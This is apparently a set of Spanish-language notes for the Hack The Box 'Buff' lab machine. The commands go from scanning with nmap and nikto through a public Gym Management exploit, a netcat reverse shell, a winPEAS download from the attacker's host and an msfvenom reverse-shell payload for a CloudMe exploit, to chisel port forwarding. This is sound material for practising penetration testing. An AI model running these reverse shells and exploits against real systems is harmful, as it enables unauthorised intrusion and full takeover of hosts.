nmap -A -p- -oA buff 10.129.191.5 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA active 10.129.191.5
nmap -sU -O -p- -oA buff-udp 10.129.191.5
nikto -h 10.129.191.5:8080
whatweb http://10.129.191.5:8080
http://10.129.191.5:8080
Hacemos un searchsploit Gym Management
Bajamos el archivo
searchsploit -m 48506.py
python2 48506.py http://buff.htb:8080
Vemos que es un shell falso y parece que siempre nos da el mismo resultado.
dir C:\Users\shaun\Desktop
locate nc.exe
cp /usr/share/SecLists/Web-Shells/FuzzDb/nc.exe .
Para crear una mejor reverse shell.
nc.exe -e cmd 10.10.14.110 443
rlwrap nc -lvnp 443
Vemos que tipos de privilegios tenemos
whoami /priv
whoami /all
curl http://10.10.14.110/winPeasx86.exe -o winPEAS.exe
https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases
.\winPEAS.exe
netstat -nat
Despues de ejecutar winPeas.exe y ver el resultado. Vemos el puerto 8888 que usa CloudMe
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.110 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
Copiamos el resultado al script que obtenemos abajo y lo cambiamos el payload del script en 48389.py
./chisel server --reverse -p 8000
.\chisel.exe client 10.10.14.110:8000 R:8888:localhost:8888
nc -lvnp 443